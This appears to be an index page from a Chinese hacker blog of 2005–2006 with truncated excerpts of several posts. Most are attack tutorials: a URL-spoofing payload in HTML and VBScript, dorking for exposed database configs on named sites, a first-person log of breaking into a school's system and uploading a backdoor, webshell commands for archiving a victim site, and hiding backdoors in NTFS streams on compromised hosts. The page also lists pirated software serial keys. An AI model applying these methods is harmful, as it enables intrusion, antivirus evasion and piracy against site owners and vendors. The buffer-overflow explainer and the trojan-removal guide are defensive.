博文
黑客新技术 域名欺骗技术实现过程(2006-01-14 20:12:00)
摘要:网页木马种植方案一直都存在很大的问题,当然欺骗需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新浏览器漏洞实现域名的欺骗..... 前言 域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。 多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的: 当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url: url的构造格式为: 说明: url_1为用户所看到的地址,地址中不可以带"/" special_char为一个特殊的字符,即ascii码为1的字符 url_2为恶意页面地址 利用过程 首先请看这个测试页面: <html><head><title>域名欺骗技术实例</title></head><body link="#0000ff" alink="#0000ff" vlink="#0000ff">你可以看看这两个链接有什么区别:<br><h1>链接1:<script language="vbscript" src="deceive.vbs"></script></h1><h1>链接2:<a href="_blank ?>www.163.com" target="_blank">http://www.163.com/"; target="_blank" http://ww ... ";>www.163.com</a></h1></body></html>
这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码: ''''''''''''''''''''''''''''''''''''''deceive.vbs''''''''''''''''''''''''''''''''''''''''''''' '(以下请根据实际情况自行修改:) url1="http://www.163.com/" url2="http://www.google.com/" text="http://www.163.com/" url="_blank ?>http://";&url1&chr(1)& ... p;url2&"" dn="/" mous......
利用搜索引擎查找漏洞(申请+精)(2006-01-14 19:41:00)
摘要:一个老问题,另一个查找漏洞的途径,抛砖引玉吧,如果你能发现相关的东西,希望也能帖出来与大家分享。 [数据库敏感信息文件] 在PHP中,include()和require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代码库包含到当前的文件中就可以了。 最初,人们开发和发布PHP程序的时候,为了区别代码库和主程序代码,一般是为代码库文件设置一个“.inc”的扩展名,但是他们很快发现这是一个错误,因为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时,我们就会得到该文件的源代码,PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的,一般是“.php”, “.php3”和“.phtml”。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中,那么远程攻击者很容易得到这些信息。 有些人往往都把数据库的连接信息单独放到一个文件中,文件命名为connect.inc/config.inc/db_connect.inc等等吧,有很多网站就曾经这样, sohu.com/塞迪网(www.ccidnet.com)/中关村在线(zol.com.cn)/电脑之家(pchome.net)等等,很多很多呀. [查找这个文件] 这个包含数据库信息的文件一般要放到inc/include等等一类的目录下,作为一名管理员OR程序员当然不希望这被一个攻击者看到,于是修改为一个难以猜到的目录名或者文件名,以防止被别人很容易猜到。但是程序员要让自己的代码有可读性一般都使用几个常见的名字去命名,这样的话,可以写一个穷举的程序去进行“破解”,没准就能碰上几个。这是最笨的方法了,现在来说一般成功率是很小的,特别相对于大的站点来说。我曾经随便试过几个,没有1次成功 所以我介绍一种使用搜索引擎来查找这个文件的方法,来快速查找这个文件。在介绍搜索引擎的使用之前,先介绍以下一个问题: PHP在运行出错的情况下一般都会出现错误的提示,这个错误提示会提供相关的信息,这个提示的相关信息很可能就会让攻击者有机可乘。比如访问http://host/index.php出现如下错误: MySQL Connection Failed: in /home/http/htdo......
入侵XXX学校教务管理系统过程记录(2005-10-06 20:46:00)
摘要:以前的女朋友告诉我,她在学校(教务管理系统)报网上选修课的帐号密码丢了,或许是被别人修改了。入侵开始:1;扫描学校所在的整个C类IP段在线的主机。结果出来了,共有4个存活主机。经过测试得知211.*.*.3 ->学校网站首页服务器211.*.*.5 ->图书馆网站服务器211.*.*.12 ->招生部网站服务器211.*.*.13 ->财务部网站服务器211.*.*.21 ->Mail系统+教务管理系统(也就是报网上选修的地方,这就是目标了)服务器用X-Scan大概扫描了一下没有什么致命的漏洞,我想使用系统漏洞入侵的时代已经渐渐离我们远去了,现在流行的是脚本渗透,SQL注入等。那么让我看一下211.*.*.21有没有可疑的地方,Mail系统我找不到登陆口暂时放弃,教务管理系统大概看了看,系统非常大,但是我没有可用的帐号,只能在门口转悠,里面的世界还都无法看到。我转了半天发现有一个投票接口存在SQL注入,不过可惜的是屏蔽了出错信息,这让我非常烦恼,大家知道投票一般都是限制一个IP只能投票一次来增加结果的真实性。可是这个系统却很搞笑,IP信息竟然是存放在一个Form表单中可以随意修改,设计者这一弱智的举动,仅让我对成功注入产生了极大的信心。不过最终我发现注入失败,似乎限制了查询语句的长度,而这个长度根据观察似乎只有4字节,看来要放弃这个注入点了。这套教务管理程序从来没有见过,该系统文件命名规则让我很头疼,似乎是用拼音的缩写,我搞不明白,想试图猜解他的一些程序的路径都总是失败。我能访问到的只有很少的一部分程序。我开始设法搞到这套系统的完整程序包,看一下底部的版权信息:青XX软件有限公司,呵呵直接把网址都给我写上了,Thank you SBAdmin(SBAdmin我发明的单词SB+Admin)。点击链接却迟迟打不开网站,最后返回“该页无法显示”的错误。暂时放弃搞到此系统完整程序包的想法。我把注意力集中到了学校的网站首页,也就是211.*.*.3这台机器,我打开他的新闻栏目,很简陋的新闻系统,我尝试了一下“upfile.asp”、“upload.asp”、“upload.htm”,呵呵不出所料,存在upload.htm,而且没有验证,任何人都可以上传,我上传个.asp后门试试看,真搞笑提示“文件类型非法!...文件上传完毕!”,真够低能的,既然......
写给菜鸟详谈asp木马在打包中的运用(2005-10-03 20:42:00)
摘要:前言:一个很老的话题了,最近好多朋友找我帮忙搞代码,n多关于打包的问题,写篇文章出来,不是新的技术,只是为了让支持火狐的菜鸟能学到些基本知识,大牛们不要见笑。 海洋2005asp后门打包方法〖Wscript.Shell〗Wscript.Shell方法[rar.exe路径 a 生成包路径 要打包的目录]若对方安装了winrar并是默认安装的话 这样命令打包c:\programe files\winrar\rar.exe a D:\WEB_USER\www\bak.rar D:\WEB_USER\www若对方没有安装winrar就传上去一个你的winrar给他,打包方法不变如我传了一个rar.exe在d盘那么打包命令就变成了d:\rar.exe a D:\WEB_USER\www\bak.rar D:\WEB_USER\www再说冰狐的微型后门打包方法若c:\programe files\winrar\可读取到的话就选择冰狐的运行程序功能 input path框输入 winrar a D:\WEB_USER\www\bak.rar D:\WEB_USER\wwwInput Name框为空 Run即可最后再解释一下以上打包的命令执行的结果运行rar打包 将 D:\WEB_USER\www 目录中所有文件打包至D:\WEB_USER\www\文件名为bak.rar大家可以在自己机器上测试一下 实在没什么好写的最近很少研究web入侵了加上过年家中事务忙 写一篇垃圾文章给大家不足处望体谅 转贴于 华夏黑客同盟 http://www.77169.org
......
2005年最新序列号(2005-10-03 20:33:00)
摘要:软件名称 心动文件夹 3.5 注册版 更新时间 2005-4-1 注册码 Name:crsky Code:1715C36117 软件名称 WinBoost V4.90 注册码 更新时间 2005-4-1 注册码 name:www.ayxz.com code: hc8x3r-4x4ak5j3-4c3g88 软件名称 ClipMate V6.5.11 Build 545 汉化破解版 更新时间 2005-4-1 注册码 Name: tiansha.net Code: 48BE-584B-2AFB-53B4-2F57-7DFF-3E82-7468-D9EA-5D75-359C-FB16-8065 软件名称 完美卸载 2005 V18.1 注册码 更新时间 2005-4-1 注册码 用户名:天煞网注册码:E7574E7676B24AF3-573E0B39D58A54A0-E7574E7676B24AF3 用户名:倪雷杰注册码:E7574E7676B24AF3-573E0B39D58A54A0-E7574E7676B24AF3 完美卸载V2005 v18.0a 软件名称 MegaView 8.0 汉化破解版 更新时间 2005-4-1 注册码 注册信息:name:tiansha.net serial :mgv768gndpqxywywb7wqr2iev 软件名称 超级兔子魔法设置v6.41 更新时间 2005-3-31 注册码 Name:crsky Code:MSCNC-DDJOG-OGQXF-BQSTE-LUVJC 序列号(用户):SOFTREG11016 注册码(密码):MSCNC-COPGN-SWBKW-WAQBU-EDGOS 软件名称 超级兔子6.30注册码 更新时间 2005-3-31 注册码 序列号SOFTREG11016 注册码MSCNC-COPGN......
给你的肉鸡中免杀的后门(2005-09-10 21:11:00)
摘要:测试环境:Windows Server 2003 Sp1. 磁盘格式NTFS
这里的免杀,跟加壳,改特征码一点关系都没有.所以新手不要害怕.我一般呢就是在肉鸡上种Radmin+灰鸽子+黑客守卫者+servu.dll,你看看有几个是被杀的.
鸽子.国内大名鼎鼎的远程控制软件.KV,卡巴紧盯着不放呢.新版的出来也最多一两天就被XX了.改特征码是可免杀,对高手是件简单的事.对初学者呢..呵呵就不
多说了.Radmin因为用来搞黑的人太多了.也被杀毒软件盯上.黑守就跟不用说了.servu.dll这个好象还没被杀.好切入正题,我们今天要说的就是利用ADS流来搞免
杀.其实就是欺骗杀毒软件而已.不过有一点要注意的是:此招不可在FAT32下使用.就是说磁盘格式不能是FAT32,正好适合服务器使用.
ADS流的简介:
微软的平台不断在增加.公司用的服务器和桌面操作系统运行的一般是winNT和win2000,而家庭用户和学生用的系统一般是winXP.这些平台是很受欢迎的并且被
大范围的使用.可是使用这些操作系统的用户和管理员却对NTFS文件系统的某个特性知道的很少,那就是”交换数据流”(alternate data streams).
NTFS因为它的稳定性 强大的功能 以及它所提供的安全性而成为一种更优越的文件系统,NTFS交换数据流(ADSs)是为了和Macintosh的HFS文件系统兼容而设计的
它使用资源派生(resource forks)来维持与文件相关的信息,比如说图标及其他的东西.而微软提供了一种方法通过Windows explorer来创建特殊的ADSs,检测这
种特殊的ADSs的必要工具和功能相当缺乏.说来也奇怪,系统一直以来都有允许用户创建ADSs以及在这种流文件中执行隐藏代码的功能和工具.好,下面我们来实际操作一下.
cmd下输入.echo sb110 >>77169.txt:3721.txt 测试一下.要在NTFS分区下才好使. 将sb110的内容写到77169.txt里,直接看不到.
notepad 77169.txt:3721.txt 意思用记事本打开77169.txt:3721.txt 注意:必须把......
缓冲区溢出原理及防护(2005-09-10 21:08:00)
摘要:中科院研究生院 蒋 涛
摘 要 本文详细分析了缓冲区溢出的原理,描述了网络攻击者利用缓冲区溢出漏洞进行系统攻击的一般过程,最后简单讨论了几种缓冲区溢出的保护方法。
关键词 缓冲区溢出 缓冲区溢出漏洞 安全攻击 缓冲区溢出保护
在过去的十年中,以缓冲区溢出为攻击类型的安全漏洞是最为常见的一种形式。更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权!由于这类攻击使任何人都有可能取得主机的控制权,所以它代表了一类极其严重的安全威胁。
缓冲区溢出攻击之所以成为一种常见的攻击手段,其原因在于缓冲区溢出漏洞太普通了,并且易于实现。而且,缓冲区溢出所以成为远程攻击的主要手段,其原因在于缓冲区溢出漏洞给予了攻击者所想要的一切:殖入并且执行攻击代码。被殖入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。本文简单介绍了缓冲区溢出的基本原理和预防办法。
一、缓冲区溢出的概念和原理
缓冲区是内存中存放数据的地方。在程序试图将数据放到机器内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出。而人为的溢出则是有一定企图的,攻击者写一个超过缓冲区长度的字符串,植入到缓冲区,然后再向一个有限空间的缓冲区中植入超长的字符串,这时可能会出现两个结果:一是过长的字符串覆盖了相邻的存储单元,引起程序运行失败,严重的可导致系统崩溃;另一个结果就是利用这种漏洞可以执行任意指令,甚至可以取得系统root特级权限。
缓冲区是程序运行的时候机器内存中的一个连续块,它保存了给定类型的数据,随着动态分配变量会出现问题。大多时为了不占用太多的内存,一个有动态分配变量的程序在程序运行时才决定给它们分配多少内存。如果程序在动态分配缓冲区放入超长的数据,它就会溢出了。一个缓冲区溢出程序使用这个溢出的数据将汇编语言代码放到机器的内存里,通常是产生root权限的地方。仅仅单个的缓冲区溢出并不是问题的根本所在。但如果溢出送到能够以root权限运行命令的区域,一旦运行这些命令,那可就等于把机器拱手相让了。
造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。例如下面程序:
example1.c
void func1(char *input) {
char buffer[16]; ......
菜鸟如何查找清除插入式木马程序(2005-09-10 21:00:00)
摘要:目前网络上最猖獗的病毒估计非木马程序莫数了,2004年后木马程序的攻击性也有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等,这些木马也是目前最难对付的。本期就教你查找和清除线程插入式木马。
操作步骤:
1.通过自动运行机制查木马
一说到查找木马,许多人马上就会想到通过木马的启动项来寻找“蛛丝马迹”,具体的地方一般有以下几处:
1)注册表启动项:
在“开始/运行”中输入“regedit.exe”打开注册表编辑器,依次展开[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\]和[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\],查看下面所有以"Run"开头的项,其下是否有新增的和可疑的键值,也可以通过键值所指向的文件路径来判断,是新安装的软件还是木马程序。
另外[HKEY LOCAL MACHINE\Software\classes\exefile\shell\open\command\]键值也可能用来加载木马,比如把键值修改为“X:\windows\system\ABC.exe "%1"%”。
2)系统服务
有些木马是通过添加服务项来实现自启动的,大家可以打开注册表编辑器,在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]下查找可疑键值,并在[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\]下查看的可疑主键。
然后禁用或删除木马添加的服务项:在“运行”中输入“Services.msc”打开服务设置窗口,里面显示了系统中所有的服务项及其状态、启动类型和登录性质等信息。找到木马所启动的服务,双击打开它,把启动类型改为“已禁用”,确定后退出。也可以通过注册表进行修改,依次展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\服务显示名......